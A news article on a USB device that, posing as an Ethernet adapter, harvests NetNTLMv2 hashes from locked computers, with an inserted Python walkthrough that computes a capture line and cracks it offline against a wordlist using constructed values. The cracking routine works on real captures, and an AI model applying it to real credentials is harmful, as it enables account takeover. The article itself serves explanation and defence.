If you think a strong password and a locked screen can protect your computer from being compromised, think again. In an attack that works on both Windows and Mac, a security researcher has shown how cheap hardware can be used to capture a logged-in user's credentials in well under a minute.
Rob "Mubix" Fuller, principal security engineer at R5 Industries, tested the technique with a selection of USB-pluggable single-board computers that run Linux, including the USB Armory ($155, £115) and the Hak5 Turtle ($50, £38).
He found, as outlined in an in-depth blog post, that once an attacker has physical access to a computer these devices can be programmed to harvest the account's hashed credentials (NTLM challenge-responses) from a locked system; those hashes can then be cracked offline to recover the password.
Fuller tested the technique on Windows 98, 2000, XP, 7 and 10, as well as OS X El Capitan and Mavericks. He said he was able to obtain credentials from the Mac too, but that further testing is needed to find out whether that result was "a fluke."
Ultimately, the attack works because most computers will automatically install a plug-and-play USB device that identifies itself as an Ethernet adapter without question, even while the screen is locked, he said.
"Even if a system is locked out, the device still gets installed. There are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems [...] but Ethernet/LAN is definitely on the white list."
While an attacker needs physical access to the computer for the attack to work, Fuller said that the time from plugging the device in to capturing a credential, depending on the operating system, averages around 13 seconds. "This is dead simple and shouldn't work, but it does. Also, there is no possible way that I'm the first one that has identified this," he said.
For those wanting to see the attack in action, Fuller recorded the process and uploaded it to YouTube. In an email to Ars Technica, he gave a more technical explanation of how the process takes place.
He said: "What is happening in the video, is the USB Armory is being plugged into a locked (but logged in) system. It boots up via the USB power, and starts up a DHCP server, and Responder. While it's doing this, the victim is recognising it as an Ethernet adapter.
"The victim then makes route decisions and starts sending the traffic it was already creating to the Armory instead of the 'real' network connection.
"Responder does its job and responds to all kinds of services asking for authentication, and since most OSs treat their local network as 'trusted' it sees the authentication request and automatically authenticates. Seeing that the database of Responder has been modified the Armory shuts down (LED goes solid)."
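As an added worked example (not Fuller's code, and not part of Responder), the following Python models the exchange the quote above describes at the NTLMv2 level. The victim-side function plays the locked-but-logged-in workstation answering the attacker's NTLM challenge and yields the same user::domain:challenge:proof:blob line that Responder logs and that hashcat mode 5600 consumes; the crack function shows why that capture is dangerous, namely that the response can be tested offline against a wordlist with no further access to the machine. Every concrete value (user alice, domain CORP, the password, the 8-byte server challenge and client nonce, the timestamp) is constructed for the example, and the SMB/HTTP framing that carries the NTLM messages is out of scope.

```python
"""NetNTLMv2 capture-and-crack walkthrough (added example; not Fuller's or
Responder's code).  Models what the rogue USB Ethernet adapter harvests:
the locked workstation answers an NTLM challenge with HMAC-MD5 keyed by a
derivative of its NT hash, and that response can be cracked offline."""
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean fn, additive constant, word order, per-step shifts)
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, w in enumerate(order):
                a = rol((a + fn(b, c, d) + x[w] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password (no salt, no iteration)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: user name upper-cased, domain used as sent (MS-NLMP 3.3.2)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def ntlmv2_proof(ntlmv2_key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the 16-byte value Responder records and hashcat -m 5600 attacks."""
    return hmac.new(ntlmv2_key, server_challenge + blob, "md5").digest()


def build_blob(timestamp: int, client_nonce: bytes, domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ('blob') with a minimal AV_PAIR target-info list."""
    target_info = struct.pack("<HH", 2, 2 * len(domain)) + domain.encode("utf-16le")  # MsvAvNbDomainName
    target_info += struct.pack("<HH", 0, 0)                                            # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)


def victim_authenticates(user: str, domain: str, password: str,
                         server_challenge: bytes, blob: bytes) -> str:
    """What the locked-but-logged-in workstation does when the attacker's listener
    demands NTLM auth for traffic the OS was already sending: it signs the
    attacker-chosen challenge and hands the result over.  Returned in the
    user::domain:challenge:proof:blob layout Responder writes to its logs."""
    proof = ntlmv2_proof(ntlmv2_hash(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(capture_line: str, wordlist):
    """Offline attack on one captured line: recompute NTProofStr per candidate."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture_line.split(":")
    server_challenge, proof, blob = (bytes.fromhex(v) for v in (chal_hex, proof_hex, blob_hex))
    for candidate in wordlist:
        guess = ntlmv2_proof(ntlmv2_hash(candidate, user, domain), server_challenge, blob)
        if hmac.compare_digest(guess, proof):
            return candidate
    return None


if __name__ == "__main__":
    # All values below are constructed for the example, not a real capture.
    blob = build_blob(131183165830000000, bytes.fromhex("a1b2c3d4e5f60718"), "CORP")
    line = victim_authenticates("alice", "CORP", "Summer2016!", bytes.fromhex("1122334455667788"), blob)
    print(line)
    print("cracked:", crack(line, ["letmein", "Summer2016!", "hunter2"]))
```

The point the code makes is that the workstation never sends the password, only an HMAC over an attacker-chosen challenge, yet because the NT hash is an unsalted MD4 of the password, every candidate can be checked at the cost of one MD4 and two HMAC-MD5 operations. The MD4 routine is hand-rolled because `hashlib.new("md4")` is frequently unavailable on OpenSSL 3 builds; checking `nt_hash("password")` against the well-known value `8846f7eaee8fb117ad06bdd830b7586c` confirms it.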
For anyone concerned, Fuller has pointed to one mitigation that appears to work and said he will publish follow-up research on how to prevent attackers from exploiting this weakness. In the meantime, he offered some friendly advice on Twitter: "Don't leave your workstation logged in, especially overnight, unattended, even if you lock the screen."